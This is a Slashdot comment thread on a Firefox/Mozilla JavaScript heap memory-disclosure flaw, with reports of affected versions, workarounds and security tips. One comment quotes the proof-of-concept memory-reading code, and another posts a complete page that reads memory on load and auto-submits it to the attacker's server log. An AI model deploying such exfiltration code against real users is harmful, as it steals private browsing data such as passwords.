    Wouldn't it have been better to give mozilla/firefox a chance to release a new version?

  10. Definitely a big hole by RzUpAnmsCwrds · · Score: 4, Insightful

    This is a *huge* hole. In three clicks, it disclosed previous URLs that I had visited, POSTDATA (including my Slashdot password) and a bunch of other stuff.

    If this could be automated (and it easily could be with something like XML-RPC), imagine the possibilities for phishing. Visit a page, have your credit card number disclosed.

    Time for Firefox 1.03.

    1. Re:Definitely a big hole by Mercury2k · · Score: 1

      And you were dumb enough to click the link giving the admin of that web server permanent logs of your computer's RAM contents? Now we just have to hope that the RAM contents of the 100000 or so /. people who clicked that link don't get compromised and used for a botnet.

    2. Re:Definitely a big hole by RzUpAnmsCwrds · · Score: 1

      "And you were dumb enough to click the link giving the admin of that web server permanent logs of your computer's RAM contents? Now we just have to hope that the"

      And you were dumb enough to assume that I didn't check the source code before clicking the button. No data is transmitted with this example.

      Of course, other websites may not be so forgiving.

    3. Re:Definitely a big hole by Narchie+Troll · · Score: 1

      1. I'm not too worried about Secunia noticing what porn sites I've been browsing.
      2. The example doesn't send any data to the server anyway. The only person seeing your data in this particular example is you.

  11. IE & Opera Unaffected by TFGeditor · · Score: 4, Interesting

    Just for grins, I tried it with IE and Opera. Just threw up a bunch of XXXXX in the text box.

    Clearly a Mozilla-specific problem.

    --
    Ignorance is curable, stupid is forever.
    1. Re:IE & Opera Unaffected by MoogMan · · Score: 2, Funny

      Well yeah, otherwise the headline would be

      "Mozilla / Firefox / IE / Opera Memory Exposure Vulnerability"

      wouldn't it?

    2. Re:IE & Opera Unaffected by TFGeditor · · Score: 1

      Yes, if you assume they tested the other browsers. I could have missed it, but I did not see other browsers mentioned in TFA as excluded from the vulnerability, so I tried it for myself, and thought others would find it interesting.

      Problem?

      --
      Ignorance is curable, stupid is forever.
    3. Re:IE & Opera Unaffected by Zork+the+Almighty · · Score: 4, Insightful

      No, it would be "New Critical IE Vulnerability" and it would be on the front page...

      --

      In Soviet America the banks rob you!
    4. Re:IE & Opera Unaffected by crisco · · Score: 1
      anyone try this in Linux?

      I'm just getting Xs even after hammering on the link for a bit.

      Browser is Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050404 Firefox/1.0 (Ubuntu package 1.0.2)

      I guess that even though this is version 1.0.2, someone in Debian or Ubuntu backported the fix and it was available in my last update.

      --

      Bleh!

    5. Re:IE & Opera Unaffected by qqtortqq · · Score: 1

      Yeah, the vulnerability is present in my Linux version of Mozilla 1.7.5.

    6. Re:IE & Opera Unaffected by LittleBigLui · · Score: 1

      firefox-bin-1.0.2 on gentoo is vulnerable.

      Don't beat me for using -bin.

      --
      Free as in mason.
    7. Re:IE & Opera Unaffected by Ciaran_H · · Score: 1

      I'm using Firefox 1.0.2 on Gentoo from source and it's vulnerable as well.

  12. Simple JavaScript by duerra · · Score: 2, Insightful

    It works if you don't click quickly and repeatedly in Firefox.

    It's almost scary... the JavaScript for this looks to just abuse a buffer overflow in an almost scary-easy way.

    function genGluck(str){
    var x = str;
    var rx=/end/i;
    x = x.replace(rx,function($1){
    $1.match(rx);
    return "";
    });
    x = x.replace(/^end/,"");
    return x;
    }

    function readMemory()
    {
    var mem = genGluck("{10,246 "X's" here}end");

    mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

    document.getElementById('result').value = mem;

    }

  13. Just a clarification by Anonymous Coward · · Score: 0

    Javascript anywhere on the page executes as it is parsed.

    1. Re:Just a clarification by ChipMonk · · Score: 1

      JavaScript in a callback function (i.e. "onmouseover" event) does not execute until invoked by a user event. RTFA for an example.

  14. No problem here by jkerman · · Score: 2, Informative

    just displays all "XXXXXXXXXXX" for me.

    using OSX with nightly builds auto-downloaded with FireFix (which is a really neat app)

    1. Re:No problem here by dougmc · · Score: 2, Funny
      just displays all "XXXXXXXXXXX" for me.
      Hey! How did it find my password on your browser?!@?!@$?!
  15. Ok, confirmed by cjsnell · · Score: 4, Informative
    You can write a nasty little page that continuously dumps the 10k bytes of memory data to a file on your server. Here's an example that uses an HTML::Mason page to do this:
    <HTML>
    <HEAD>
    <TITLE>Nasty Demo</TITLE>
    </HEAD>
    <BODY BGCOLOR='#FFFFFF' COLOR='#222222' onLoad="readMemory();">
    <SCRIPT language="JavaScript">
    function genGluck(str){
    var x = str;
    var rx=/end/i;
    x = x.replace(rx,function($1){
    $1.match(rx);
    return "";
    });
    x = x.replace(/^end/,"");
    return x;
    }

    function readMemory()
    {

    First peice of readMemory() removed to satisfy Slashdot crapfilter
    mem = mem.replace(/[^\.\\\:\/\'\(\)\"\_\?\=\%\&\;\#\@\- a-zA-Z0-9]+/g, " ");

    document.nasty.result.value = mem;

    document.nasty.submit();

    }

    </SCRIPT>
    <FORM METHOD=POST NAME='nasty'>
    <INPUT NAME=result TYPE=HIDDEN VALUE='' onClick='readMemory();'>
    </FORM>
    <BR><BR>
    </BODY>
    </HTML>

    <%args>
    $result => ''
    </%args>
    <%init>
    open(OUTFILE,'>>/tmp/outfile');
    print $result OUTFILE;
    close(OUTFILE);
    </%init>
  16. Mod parent something else .. by Anonymous Coward · · Score: 0

    who the hell modded this flamebait.
    Please explain to me why this is flamebait, could you...
    All he is doing is expanding on the problem and asking for more details?

    -mike

    1. Re:Mod parent something else .. by FidelCatsro · · Score: 1

      Hm well I did not want to answer myself but yes I agree, I do not see why my post is flamebait, I am not bashing Firefox ... I have used it since the early days and love the browser dearly ... and I do not think it is wrong to point out that this is a bug compared to IE's ActiveX being an insecure feature..
      (I do not care about the karma , my karma is maxed out and this wont hurt it any)

      FCat

      --
      The only things certain in war are Propaganda and Death. You can never be sure which is which though
    2. Re:Mod parent something else .. by Zareste · · Score: 1

      Nevar fear! I had the honor of meta-moderating the guy who marked it ;)

      --
      I am NOT a number! I am a - oh wait, I'm number 761710. Look! 761710!
  17. Safari slightly vulnerable? by inio · · Score: 2, Insightful

    In addition to a bunch of Xs, Safari threw a little piece of Javascript code not originating on the source page into the end of the text box. Looks like it might be a little vulnerable too.

    1. Re:Safari slightly vulnerable? by LincolnQ · · Score: 2, Insightful

      No, Safari doesn't support Javascript's function objects (lambdas?), which the test seems to use. I don't know if rewriting the test in a different way would make it work, but I doubt it. It appears to be a flaw in the regular expression engine in Gecko.

  18. Download the latest patched version right here by OmegaGX · · Score: 3, Informative

    Download the latest patched version right here: http://ftp.mozilla.org/pub/mozilla.org/firefox/nightly/latest-trunk/firefox-1.0+.en-US.win32.installer.exe
    I just used it and I am not vulnerable: all I see are lots of X's just like in IE.

    1. Re:Download the latest patched version right here by tracemonkey · · Score: 1

      Is there a fix for this that's also in the 1.02 version?

  19. Access to firefox heap, not entire system by jgoemat · · Score: 2, Insightful
    This exploits a vulnerability in Mozilla/FireFox's javascript engine. It allows the javascript code on the web page to access an arbitrary amount of heap data of the FireFox application. The locations in memory and the size of the block returned cannot be set, so you basically get random data from FireFox's heap. Most likely under a kilobyte of data will be returned, and it will most likely be data from some web page or file you downloaded.

    This data is available to the javascript engine then, so it is possible for the javascript to submit it a number of ways to an internet server. It could call a web service with the data or post it to a web page. The server could then organize this data and examine it for anything interesting.

    This will not allow someone to read your personal files or hijack your computer. The real problem would be if stored passwords or sensitive data from web mail or banking sites were on the heap and were found this way and transmitted to a web site. A large amount of 'Junk' would have to be sifted through in order to get any juicy data though.

    The only way to be safe right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.

    1. Re:Access to firefox heap, not entire system by Anonymous Coward · · Score: 1, Informative

      Seeing as many sites (including /.) require javascript to use, this really isn't a good option.

      This is bullshit. Lots of sites use Javascript, but very few sites require Javascript. Slashdot is one example of a website that uses Javascript without requiring it.

      So ignore the parent, go ahead and switch Javascript off. If you find a website that is broken, email a complaint, and, if you trust the website, enable Javascript for that one website, and switch it off again afterwards.

      As far as I can tell, the #1 problem with switching Javascript off is clueless web developers doing <a href="#" onclick... for popups which is completely unnecessary and ignorant.

    2. Re:Access to firefox heap, not entire system by TheGratefulNet · · Score: 2, Informative

      slash requires js?

      since when?

      I disable js for all but 1 or 2 sites that I visit.

      prefbar (mozilla/firefox) allows a single click to turn on/off jscript. get it and use it.

      but you don't need js for slash. you never have.

      --

      --
      "It is now safe to switch off your computer."
    3. Re:Access to firefox heap, not entire system by TheGratefulNet · · Score: 1

      slightly offtopic, but: is there any firefox plugin that allows you to map which sites NEED jscript on (and then when you visit those sites, it auto 'presses' the jscript enable button)? similarly, when you switch to a tab or window that has a site that is mapped (manually, by you, in some config file) as NOT needing jscript, it disables it?

      I'd LOVE to have that. there are only a handful of sites that I use that NEED js. most don't. and in some sites, it's BAD to have js on (i.e., I get more ads with js than I do with simple static html - so some sites are better 'experienced' with js off).

      anyone know if there is any way on a per-site basis to have js on and off?

      --

      --
      "It is now safe to switch off your computer."
    4. Re:Access to firefox heap, not entire system by Anonymous Coward · · Score: 0

      Sadly, while virtually every other browser allows you to have per-site Javascript settings (even Internet Explorer!), it seems the Firefox developers consider it to be unnecessary.

      Search this page for "per-URL" to get some relevant information.

    5. Re:Access to firefox heap, not entire system by ralphdaugherty · · Score: 1

      The only way to be safe right now is (in FireFox) to go to Tools->Options, go to "Web Features", and uncheck "Enable Javascript". Seeing as many sites (including /.) require javascript to use, this really isn't a good option. I hope the team gets a fixed version out soon.

      The /. site doesn't require Javascript to work as far as reading and making posts. I keep it turned off all the time except when filling out forms or such where it is useful to me.

      rd

    6. Re:Access to firefox heap, not entire system by spitzak · · Score: 1

      Has anybody looked into making a "guess what the JavaScript does" plugin? It would examine the JavaScript on a button or link and take a guess as to what the URL it is trying to open is, and open it.

      Certainly I have been able to guess the URL by looking at one-line samples of Javascript. Is this possible in general? Would it be good enough to allow you to leave javascript off?

    7. Re:Access to firefox heap, not entire system by Anonymous Coward · · Score: 0

      So what happens when it's code containing something like "if prompt('Are you sure you want to delete this email?') location.href = 'delete.php?id=x';"? (I know GET is horrible for stuff like this, but people use it anyway).

    8. Re:Access to firefox heap, not entire system by spitzak · · Score: 1

      My guess is that it would go to the delete page without asking the question. However an intelligent one may be able to detect that it is too complex, and go to a page saying "it's trying to execute this javascript and here are my guesses as to the URL's it's trying to open "
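
      The "guess what the JavaScript does" idea above, and the delete-link counterexample raised against it, can be made concrete with a small static classifier. This is an added example, not code from the page or from any Firefox extension: it pulls string-literal URLs out of an onclick handler and only reports the handler as safe to follow when nothing else (a condition, a prompt, a form submit, a network call) is present. The sample handlers are constructed for the example; the "delete" one mirrors the `prompt(...)`/`delete.php` case from the thread, and the token list used to flag side effects is an assumption, not a complete grammar.

```python
import re

# Constructed sample onclick handlers (not from the page or any real site);
# the "delete" one mirrors the counterexample raised in the thread.
SAMPLES = {
    "popup": "window.open('http://example.com/help.html'); return false;",
    "nav": "location.href = 'http://example.com/page?id=3';",
    "delete": "if (prompt('Are you sure you want to delete this email?')) "
              "location.href = 'delete.php?id=x';",
    "cosmetic": "document.getElementById('menu').style.display = 'none';",
}

# Literal URL arguments to the two navigation idioms: window.open('...') and
# location[.href] = '...'. Only string literals are recoverable statically;
# a URL built from variables or concatenation is deliberately not guessed.
URL_PATTERN = re.compile(
    r"""(?:window\.open\(|\blocation(?:\.href)?\s*=)\s*['"]([^'"]+)['"]"""
)

# Constructs that mean the handler does more than navigate: conditions, user
# prompts, form submission, network calls or dynamic code. Assumed token list;
# anything matching here makes the handler "complex" and not auto-followable.
SIDE_EFFECT_PATTERN = re.compile(
    r"\b(if|for|while|switch|function|prompt|confirm|submit|eval"
    r"|XMLHttpRequest|ActiveXObject|setTimeout|setInterval)\b"
)


def guess_urls(snippet):
    """Return every string-literal URL passed to window.open or assigned to location."""
    return URL_PATTERN.findall(snippet)


def classify(snippet):
    """Decide what a JavaScript-off browser could safely do with an onclick handler.

    Returns ("follow", [url]) when the handler is a bare navigation to one literal
    URL, ("complex", urls) when a URL is present but the handler also branches,
    prompts, submits or otherwise has side effects, and ("none", []) when no
    literal URL is found at all.
    """
    urls = guess_urls(snippet)
    if not urls:
        return ("none", [])
    if len(urls) > 1 or SIDE_EFFECT_PATTERN.search(snippet):
        # Following the URL here would replay the action without the check the
        # page author put in front of it (the "delete this email?" prompt).
        return ("complex", urls)
    return ("follow", urls)


def main():
    for name, snippet in SAMPLES.items():
        verdict, urls = classify(snippet)
        print(f"{name:9s} {verdict:8s} {urls}")


if __name__ == "__main__":
    main()
```

      The point of the "complex" verdict is the one made in the replies: a guesser must refuse rather than strip the `prompt()` and navigate anyway, because a GET that performs a destructive action is exactly the case where a wrong guess does damage. A classifier like this can be shown to the user as a list of candidate URLs with the original handler text, which is the "here are my guesses" page described above.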

  20. comma by Anonymous Coward · · Score: 5, Insightful
    which can be exploited by any web site to read all memory, which the browser process has access to

    I don't normally complain about the grammar and punctuation of submitters and editors, but in this case it is too significant. The difference between

    read all memory, which the browser process has access to

    and

    read all memory which the browser process has access to

    Is profound. The first form says that the browser has access to all memory. The second form says that the web site has access to all the memory to which the browser also has access. Catching and fixing stuff like this is what an editor does. If Slashdot's people can't do that, then don't call them editors. Call them "Dudes Who Click Approve," or something like that.

    1. Re:comma by Dachannien · · Score: 1
      According to the grammar checker in MS Word, the second example is still incorrect, and should instead say this:
      "read all memory that the browser process has access to"
      The only way to pacify MS Word, if you insist upon using "which", is to put the comma before it.

      Of course, this is all to say nothing of ending the sentence with a preposition, but that hardly has the impact noted by the parent ;)
    2. Re:comma by EGaming · · Score: 1

      I think the Simpsons said it best when the family goes to the best lawyer in town and hands him a coupon:
      Coupon: "No money down!"
      Hutz: "What? This thing is all screwed up"
      [hutz writes on it]
      Coupon now reads: "No. [M]oney down!"

    3. Re:comma by kwoff · · Score: 1

      The Word grammar checker is right. You're supposed to use "that" there.

  21. doesn't show anything but XXXXs for me by dalutong · · Score: 1

    maybe my ubuntu hoary system is patched? or this doesn't affect linux?

    --

    What comes first, finding a teacher or becoming a student?
    1. Re:doesn't show anything but XXXXs for me by crisco · · Score: 1
      Yeah I noticed same thing and posted about it somewhere here.

      Browser string is Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.6) Gecko/20050404 Firefox/1.0 (Ubuntu package 1.0.2), the 4/4/05 makes me think a fix was backported for us. Gives me a little more happiness about Ubuntu and Debian, though I'm sure it has made its way into other distributions as well.

      --

      Bleh!

  22. Re:MOD PARENT DOWN! by Anonymous Coward · · Score: 0

    "This "gator" is trolling like a cumsnake trolls for cum."

    Good job proving his point, jack ass.

  23. CRASH? by EGaming · · Score: 1

    Firefox Version 1.02: Clicking the link repeatedly and quickly causes a crash. Any others have the same thing happen? If so, this could be a bigger problem than just a security hole.

    1. Re:CRASH? by srstoneb · · Score: 2, Interesting

      The first time I tried it, it didn't merely crash Firefox. When I clicked the "test now" link my entire system immediately died, and began rebooting. After reboot, the test now works (and confirms my vulnerability).

      Windows 98 SE, Firefox 1.0.2.

    2. Re:CRASH? by EGaming · · Score: 1

      whole system crash? Haven't had any of those since ME. I suspect 98SE. Something is wiggy with the javascript. I've never really liked it and this proves that Java is not the cure-all to every application need.

    3. Re:CRASH? by DylanQuixote · · Score: 1

      Javascript is not java;
      Javascript does not have the Java security model.

      Java does suck, but for other reasons...

  24. Firefox's autoupdate feature needs serious work. by Guspaz · · Score: 1

    I'm running Firefox 1.0.1. I'm STILL waiting for the updater to report that 1.0.2 is available. Even if I manually tell it to check for updates, it says none are available.

    If they haven't even put 1.0.2 onto the autoupdater, how long will it be before patches like this make it out? It's pretty stupid.

  25. Other Gecko-based browsers affected as well. by Lazyhound · · Score: 2, Insightful

    K-Meleon has the same problem, only it probably won't be patched for months, forcing me back to Firefox. Bah.

  26. disable javascript? by imess · · Score: 0, Redundant

    would it be a sufficient workaround?

    1. Re:disable javascript? by imess · · Score: 0, Redundant

      argh didn't read thru...

  27. Re:Firefox's autoupdate feature needs serious work by mirrorful · · Score: 1

    I'm pretty sure they have put 1.0.2 on the autoupdater...

  28. No shock at all by TheLink · · Score: 1

    Whether it's open source or not doesn't mean much with respect to security.

    If you can't or don't want to do an audit of the source, it's usually safe to assume it's probably just as bad as whatever software the Mozilla programmers used to write.

    A good tree produces good fruit. A bad tree produces bad fruit. Sure you can get a tree to change, but it often takes years (see BIND, Sendmail).

    The fact that Mozilla crashes regularly (but not so predictably) on normal use (well at least my normal use ;) ) means there are a fair number of not that obscure security bugs left to be found.

    If it crashed predictably in only a few scenarios, then there are significantly fewer obvious bugs left to fix.

    I've already said something similar about Mozilla before. (it's modded -1 for some reason ;) ).

    Anyway it looks like I've been vindicated. Within 2 weeks too ;).

    I used to work in the IT security line. I think I've learnt at least a thing or two...

    Here's a free tip: Run your browser as a different user. You can do that in Linux/*BSD and Windows XP/2000. Use google and figure out the implementation details.

    Your browser data will still be vulnerable to attackers, but if you set up the permissions correctly, the data and documents owned by your normal user account will be safe.

    If you are paranoid you can also use a different browser user for different security levels/realms (e.g. mozbank for banking, mozprivate for other important stuff, moznormal for normal sites, mozother for unknown sites ).

    If you do that try to have different browser schemes/colours too. That way it's easier to know when you're using the wrong browser for the wrong site ;).

    Also may wish to do stuff like: have the bank browser's homepage as the bank site, and have it only allow javascript etc to be on for the bank URLs - other urls just don't get javascript and other stuff active.

    Sure it's a bit of work to set it up, but once you've got it setup it's not so hard - think of the different browsers as separate apps.

    Also make your GUI preferences a slightly different colour from the default. So if an attacker plants a trick window, hopefully it won't match and you'll notice.

    This won't protect you from GUI overflow bugs or "shatter" attacks in the case of Windows. But I believe hackers will find attacking the other users easier.

    I personally use a virtual machine to browse unknown sites, or untrusted sites that require javascript/flash. Just a click of a button and the virtual machine is back to a known state.

    That said I've managed to crash vmware. Just a DoS - (the vmware people that I emailed said they didn't think it's exploitable). When I've more time maybe I'll go check it out.

    --
  29. Re:Firefox's autoupdate feature needs serious work by Guspaz · · Score: 1

    I'm still not seeing it. If it has already been released, then there is a bug at work. Either way, something has to be fixed.